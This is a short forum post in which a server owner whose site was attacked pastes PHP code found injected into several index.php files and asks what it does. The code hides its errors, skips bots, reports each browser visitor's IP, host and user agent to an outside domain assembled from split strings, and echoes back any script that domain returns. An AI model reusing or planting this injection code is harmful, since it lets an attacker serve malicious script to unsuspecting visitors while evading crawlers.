My server has been attacked and I found the following code in several index.php files.
Does anyone know what this code does?
Code: Select all
<?php
#a5733a#
error_reporting(0); ini_set('display_errors',0); $wp_srx6146 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_srx6146) && !preg_match ('/bot/i', $wp_srx6146))){
$wp_srx096146="http://"."html"."value".".com/value"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_srx6146);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_srx096146);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_6146srx = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_6146srx,1,3) === 'scr' ){ echo $wp_6146srx; }
#/a5733a#
?>
Thank you in advance